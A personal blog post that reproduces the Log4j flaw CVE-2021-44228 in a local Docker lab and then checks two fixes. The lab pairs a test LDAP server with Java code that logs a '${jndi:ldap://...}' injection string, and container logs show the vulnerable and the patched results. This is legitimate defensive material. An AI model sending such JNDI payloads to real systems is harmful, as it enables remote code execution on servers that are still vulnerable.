Infrastructure
How to reproduce CVE-2021-44228 (Log4J vulnerability), patch it, and validate the fix
Ethical Hacking: I am explaing this so that more people can understand whats going on and protect them.
Please do not harm others.
Thought of working on it yesterday night, but I had three important events.
- There was a Christmas Party, and my kids brought me there.
- The Party is over at 8 PM, but me and Johan practiced piano notes for “Believer”. Since Johan has classes today, he went to bed after the practice, at 9:30
- But, Jadon wanted me to read books and tell him stories. After reading 5 books and more than 10 stories, finally he slept. It was at 12:30 when me and Jadon Slept
Woke up to a nightmare at 4 and could not go back to sleep. Then, I did some video editing and published my Kids Turtleback zoo video on youtube.
Finally, I had some time and started working on this.
In this article I discuss how to reproduce the CVE-2021-44228, Log4J Vulnerability, patch it and validate the fix.
I was crafting my own JNDI LDAP server, and I had the JNDI server ready. The next bit was integrating it with an LDAP server. Then, I set up OpenLDAP and am about to configure the LDAP. This is the first time I am setting up an LDAP server and realized I am going through the OpenLDAP docs. So, I ran a google search and found a nice LDAP server, specifically crafted to test this vulnerability and it simplified my work.
Acknowledgment:
- A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228 (golangexample.com)
- rakutentech/jndi-ldap-test-server: A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228. (github.com)
- A deep dive into a real-life Log4j exploitation – Check Point Software
- us-16-MunozMirosh-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE (blackhat.com)
LDAP Server: Standalone
The test LDAP Server can be run as a docker container. This container sets up an LDAP server.
docker run -i -p 1389:1389 vivasaayi/jndi-ldap-test-server:0.0.1
The test LDAP Server had an endpoint that will return a malicious string.
Precheck: Check if you have vulnerable Log4J jars.
You can use the below code to exploit the vulnerability.
import com.sun.org.apache.xpath.internal.objects.XString;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;
public class Log4JExploit {
static Logger logger = LogManager.getLogger(Log4JExploit.class);
public static void main(String... args) {
String javaVersion = "${java:version}";
String ldapUrl = "${jndi:ldap://localhost:1389/Test}";
System.out.println(javaVersion);
logger.error(javaVersion);
logger.error(ldapUrl);
System.out.println("Exiting.");
}
}
Run that code
# Updte the directory locations accordingly
javac -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar /repo/src/Log4JExploit.java
java -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar:/repo/src Log4JExploit
It will print output like this:
${java:version}
11:24:37.666 [main] ERROR Log4JExploit - Java version 1.8.0_312
11:24:37.669 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
Exiting.
Process finished with exit code 0
Simple command to check the vulnerability
You can simply build and run the above two steps using below Docker-Compose.
git clone https://github.com/vivasaayi/log4jexploit.git
cd log4jexploit
make build
make run
This is the output
(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Starting log4jexploit_ldapserver_1 ... done
Recreating log4jexploit_localpow_1 ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1 | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:29:51Z","message":"Listening on 0.0.0.0:1389"}
localpow_1 | ${java:version}
localpow_1 | 16:29:52.886 [main] ERROR Log4JExploit - Java version 1.8.0_312
ldapserver_1 | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"bind","auth_type":"simple","user":""},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Bind Request"}
ldapserver_1 | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"search","base_dn":"Test","filter":"(objectClass=*)","attributes":[],"time_limit":0},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Search Request"}
localpow_1 | 16:29:52.890 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
localpow_1 | Exiting.
FIX 1: Update the jars
I Updated Jars (log4j-api-2.16.0.jar) and it can be found in this folder: vivasaayi/log4jexploit at updated-log4j-versions (github.com)
Please download official log4j patch release for your production use.
To validate the fix, run
docker-compose down
git checkout updated-log4j-versions
git pull
make build
make run
Now you will not see the vulnerability.
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1 | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:34:08Z","message":"Listening on 0.0.0.0:1389"}
localpow_1 | ${java:version}
localpow_1 | 16:34:09.866 [main] ERROR Log4JExploit - ${java:version}
localpow_1 | 16:34:09.869 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1 | Exiting.
log4jexploit_localpow_1 exited with code 0
Fix 2: Remove JNDI lookup class
This is in this branch: log4jexploit/libs at repack-log4j · vivasaayi/log4jexploit (github.com)
This is the script that patches the old log4j jars. (I already ran the patch)
cd libs
echo "Patching log4j-core-*.."
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
To validate,
docker-compose down
git checkout repack-log4j
git pull
make build
make run
(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Creating network "log4jexploit_default" with the default driver
Creating log4jexploit_ldapserver_1 ... done
Creating log4jexploit_localpow_1 ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1 | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:37:15Z","message":"Listening on 0.0.0.0:1389"}
localpow_1 | ${java:version}
localpow_1 | 16:37:16.797 [main] ERROR Log4JExploit - Java version 1.8.0_312
localpow_1 | 16:37:16.801 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1 | Exiting.
log4jexploit_localpow_1 exited with code 0
Final Notes:
If you are on AWS there are other patches available. I will continue to work on them and provide updates in my blog.
Ethical Hacking: I am explaing this so that more people can understand whats going on and protect them.
-
AWS3 years ago
How to install NodeJS in Amazon Linux 2
-
Infrastructure3 years ago
How to test CPU, Memory and File System Performance using Sysbench
-
AWS3 years ago
How to install .Net 6 in Amazon Linux 2
-
Uncategorized3 years ago
How to install Docker in Amazon Linux 2?
-
Infrastructure3 years ago
How to get Linux OS Information using uname command
-
Uncategorized3 years ago
Everything, Everywhere, All At Once
-
Linux3 years ago
How to install git in Amazon Linux 2
-
Infrastructure3 years ago
Getting started with Terraform CDK and TypeScript